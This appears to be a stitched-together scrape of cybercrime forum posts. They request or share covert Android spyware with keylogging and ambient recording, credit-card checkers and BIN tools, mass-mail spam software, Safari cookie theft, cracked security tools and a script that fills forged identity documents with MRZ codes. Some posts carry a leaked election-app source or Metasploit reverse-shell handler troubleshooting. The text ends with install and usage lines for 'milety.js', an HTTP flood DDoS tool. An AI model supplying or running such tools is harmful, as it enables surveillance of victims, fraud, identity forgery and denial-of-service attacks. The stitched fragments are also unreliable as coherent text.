Random leak from our client. For using u can ask in my telegram - Arivite [t.me/Arivite]
Download - https://files.fm/f/5k7r6ubjs8
VT - youk
Ищу софт для записи любого разговора (телеграм,вотс,гсм связь) на андроид.
Приоритет функций:
скриншоты;
кейлоггер;
запись окружающей обстановки;
стабильность и незаметность на устройстве;
доступ к камере (по возможности);
выгрузка и сохранение указанных данных.
Установка через полный доступ к устройству.
Сделка только через гарант. Предложения типо "через гарант другого сайта..." и
т.д. - мимо
С предложениями в ЛС.
Нужен Авторегистратор мобильный, чтобы настраивался под разные сайты и каждая
регистрация под размыми IP (под прокси )
P.S Если не правильно выразился сорри
Но суть Я думаю уловили
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Fbf69e9d0d94b6cba3dab2a76e164c5bd1e2f3a76172cc40468a8552d52891d58%2Fturalalv%2FPayload- cob&hash=d5e73a3e1afa088dd36fe3c019947b43&return_error=1)
testing, Opsec checking, beacon tasking, and deployment for Cobalt Strike ](https://github.com/turalalv/Payload-cob)
Helping to automate payload development, testing, Opsec checking, beacon tasking, and deployment for Cobalt Strike - turalalv/Payload-cob
github.com
доброго времяни суток. Есть следующая проблема, может кто сталкивался и
подскажет как решить. Поднимаю exploit/multi/handler с reverse_https на хосте,
также есть валидный ssl от comodo. Не забыл указать и такие опции как set
HANDLERSSLCERT и stagerferifysslcert. Перед запуском мсф переконвертировал
серт в pem формат openssl x509 -in www_domain.crt -text public.crt.pem. Через
curl, либо браузер https://myip работает в защищенном режиме, но когда
пытаюсь поднять https listener в msf, то получаю secure connection failed.
Модуль http работает штатно. Буду благодарен за любую помощь!
p.s. готов также рассмотреть покупку манулов по кастомной настройке https в
мсф и CS
нужен софт для флуда мыла.
все популярные провайдеры (гугл, яху, комкаст итд)
по гмайлу:
чтобы хотябы 50-80% мыл летело в инбок а не в спам.
рассмотрю как готовые так и написане с нуля.
в ПМ
Софт для работы с базами mail;pass баз сортер (По странам ,и домен … )
](https://www.upload.ee/files/17537887/Bdsm.rar.html)
Bdsm.rar - Download. Upload.ee
www.upload.ee
I have a cisco ASA 5512X with sfr module and need a full crack license.
If any one can help to get this , thanks
Developed on: Bablosoft.com
You must have at least 10 reaction(s) to view the content.
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FRb59dFNEdx-1C6VzVw8d_ULWiCOn9H_0zw4WnVzKAlOKEqVQmmB213z6Sdy4uHXH8dQvkCYS3X-nCCz2999ak8cYtLBZ46COFs9D-G1Mg9_9HbFvZqtAiYdquCex9IAEeaiFqrtJmFfBy8B2Z4gwLzjADSf2e7NzZhGbdzlK6k24nkvx38yvPo0kmDIeutz1ut3CroZbLBI7hovptgKKFhpIhhRxoxE6AUpbe_ZudBc5FmRsZ8FhsfD1YftZNPynHjLvRC3qJTCrbLQydM3-jabl5HhZNzz2WXZfShVFxktgu7oJi8Z_FrHmOcNr-X1BmCOkINtz0-RFogXuiGH2Rg.jpg&hash=a15903a8f220a3a2a391a5a8073a57f7&return_error=1)
You can view and join @pwn3rzs_chat right away.
t.me
BurpSuite Professional x64 2022.9 with AUTO UPDATE again -ZEN 20220913
CREDITS:
1. to portswigger for making burpsuite pro
2. to x-Ai and h3110w0r1d for crafting java keygen and loader
3. to scz for showing the regex pattern was too specific
4. to fairycn for pointing out scz's work to me - thanks!
ABOUT BURPSUITE PRO
Everyone knows this web auditing tool. Burpsuite Pro is the defacto bug bounty
tool and integrated platform for performing security testing of web
applications. Its various tools work seamlessly together to support the entire
testing process, from initial mapping and analysis of an application’s
attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques
with state-of-the-art automation, to make your work faster, more effective,
and more fun.
"C:\Program Files\Java\jdk-17.0.4\bin\javaw.exe" -jar zen.jar
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/udo2nbQK#Oe6hqxJJVBvVtfejH4I_W8KVW-46W3jx_KiNvMe-hxA)
mega.nz
Найдись человек, кто писал для себя такой софт)
Куплю у тебя софт который пробивает авто CS..and etc...
Пиши в лс)
По цене договоримся)
Нужен чекер Сс, бот тг либо софт, их штук 20к, проверять ручками долго
У кого есть киньте)
Желательно бесплатный
Typora is a lightweight and concise Markdown editor that supports real-time rendering technology, which is the most significant difference from other Markdown editors. Instant rendering makes writing Markdown as smooth and comfortable as writing a Word document, unlike other editors that have an editing bar and a display bar.
[Python] Перебор мнемонических фраз для BTC,ETH,TRX [Русский] - мануал по установке и использованию +видео инструкции - тык мышкой
В срочном порядке, нужен человек, который сможет написать скрипт для работы в
среде photoshop в автоматическом режиме.
Необходимая задача скрипта - копирование подготовленных данных с
таблицы/текстовика в определенные текстовые поля изображения в photoshop, так
же генерация полной строки из таблицы в MRZ код с последующим его внесением в
определенное поле на изображении. Внесение изображения подписи в определенное
поле.
После этих процессов автосохранение каждого образца с отдельным названием и
переходом на новую строку в таблице (цикличность).
Связь: telegram @ivan0492
Ищу софт Palantir, Демон Лапласа
Народ подскажите софт что б с сафари можно было куки выкачивать
check it,
like wpscan for wordpress vulnscan, but w/o api bullsh*
tool ](https://github.com/LeakIX/wpfinger)
wpfinger is a red-team WordPress scanning tool. Contribute to LeakIX/wpfinger development by creating an account on GitHub.
github.com
works great for me
MINECRAFT CHECKER
1.File hosting -
download
2.File hosting -
download
Пароль : 2023
Собственно подкиньте в ЛС если кому не трудно под Линукс кряк или кейген , а то как слили в сеть под Винду версию отрубили триал . Шансов мало но спросить стоило )
Чем BINы проставить в СС по BIN базе?
раньше мне один шаман сделал на php за 15 минут такое. в окошко просто копируешь сс с любым синтаксисом, и оно дописывало банк данные, брало из бин базы.
а сейчас вспомнил, а я и сервак тот давно оставил, на котором стояло.
в связи с этим, вопрос такой. есть ли софт, который это делает? или скрипт.
готовое решение.
Does anyone have Celebrite ufed4pc software?
VirusTotal Link: https://www.virustotal.com/gui/file...315df60eb0f3ec1eb0e1d2e7212c4bff935?nocache=1
Hello everyone,
I am looking for a copy of WinLicense 3.1.7.0 and I was hoping someone would
share it.
I have a copy of IDA Pro 8.3 with x64 and x86 Decompilers that I could trade
if you want something in return.
Всем привет, нужен парсер гео, может есть у кого буду благодарен! Знаю что есть но не могу нигде найти! суть в чем, нужно в моей готовой телефонной базе проставить регионы, часовой пояс!
Писать только тем, кто готов на работу с гарантом.
Ищу софт по типу thunderbird, но с поддержкой массового добавления аккаунтов и проксей для них
Собственно сабж, поделитесь pinflux плз.
Приложение для обработки обычных и Base64 строк.
Некоторые особенности:
Преобразовать полный исполняемый файл в строку в кодировке Base64, а также
поменять местами символы результирующей строки.
Возможность шифровать простые строки или строки в кодировке Base64.
Обратить простые или закодированные строки в любой момент процесса.
Все результаты строковых процедур автоматически копируются в буфер обмена.
Перетаскивание файлов в интерфейс.
Сохранение простых, преобразованных или перевернутых строк в текстовый файл.
Автоматически разбивать байтовые подписи на строках.
Преобразование из управляемых разделенных строк в формат C++.
Скачать: https://anonfiles.com/15h7AfMcx3/FileToB64_rar
Пароль: 28108c44c7ba317c451d4a554a43ab38eb5c9dab
HCL_AppScan_Standard_v10.0.7.28135
](https://anonfiles.com/31l5B5Uexc/HCL_AppScan_Standard_v10.0.7.28135_torrent)
anonfiles.com
Looking for a tool to retrieve proxies by yourself, can automatically update the best
Hello, member xss.is
Today I am publishing the Indonesian KPU SiRekap source code, I hope you are
happy.
I analyzed that there is a strange and connected system in alibaba cloud.
Code:Copy to clipboard
format_files............................dex,xml,api,etc
format_application............................apk,zip,tar,java,property
application_date............................2024
compressed............................asset_data,api,kotlin,report_form,source)[/align]
size........................................69MB
Virus total check : [https://www.virustotal.com/gui/file...1ODI2ODg0ZmFmZTA5MTkxMTNkZTI6MTcwODY3ODk0Ng==](https://www.virustotal.com/gui/file- analysis/ODc3ZWU4Yjg5NmM1ODI2ODg0ZmFmZTA5MTkxMTNkZTI6MTcwODY3ODk0Ng==)
Sample :
sample :
JSON:Copy to clipboard
package androidx.activity;
import android.app.Activity;
import android.app.PictureInPictureParams;
import android.graphics.Rect;
import kotlin.Metadata;
import kotlin.jvm.internal.Intrinsics;
@Metadata(d1 = {"\u0000\u001e\n\u0002\u0018\u0002\n\u0002\u0010\u0000\n\u0002\b\u0002\n\u0002\u0010\u0002\n\u0000\n\u0002\u0018\u0002\n\u0000\n\u0002\u0018\u0002\n\u0000\bÁ\u0002\u0018\u00002\u00020\u0001B\u0007\b\u0002¢\u0006\u0002\u0010\u0002J\u0016\u0010\u0003\u001a\u00020\u00042\u0006\u0010\u0005\u001a\u00020\u00062\u0006\u0010\u0007\u001a\u00020\b¨\u0006\t"}, d2 = {"Landroidx/activity/Api26Impl;", "", "()V", "setPipParamsSourceRectHint", "", "activity", "Landroid/app/Activity;", "hint", "Landroid/graphics/Rect;", "activity-ktx_release"}, k = 1, mv = {1, 7, 1}, xi = 48)
/* compiled from: PipHintTracker.kt */
public final class Api26Impl {
public static final Api26Impl INSTANCE = new Api26Impl();
private Api26Impl() {
}
public final void setPipParamsSourceRectHint(Activity activity, Rect rect) {
Intrinsics.checkNotNullParameter(activity, "activity");
Intrinsics.checkNotNullParameter(rect, "hint");
activity.setPictureInPictureParams(new PictureInPictureParams.Builder().setSourceRectHint(rect).build());
}
}
Download :
Hidden content for authorized users.
Есть ли у кого DexGuard, Allatori, ZKM, Stringer?
Поделитесь пожалуйста.
Нужна
суть такова при чеке логов чекаю в ручную как сделать что бы форма логина :
логин или емейл. вставлялся автоматически.
то есть есть форма мне нужно чтобы определенный тест вставлялся автоматически
если какой то adon
Installing NODEJS 18:
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.5/install.sh | bash
source ~/.bashrc
nvm --version
nvm install v18
Installing modules:
apt install npm -y
npm i colors
npm i cheerio
npm i set-cookie-parser
npm i hpack
npm i crypton
npm i cluster
npm i commander
npm i tls
npm i http2
npm i color
npm i util
npm i request
npm i v8
Usage:
node milety.js host time req thread proxy.txt flood/bypass
node milety.js https://example.com/ 120 64 5 proxy.txt flood
DOWNLOAD: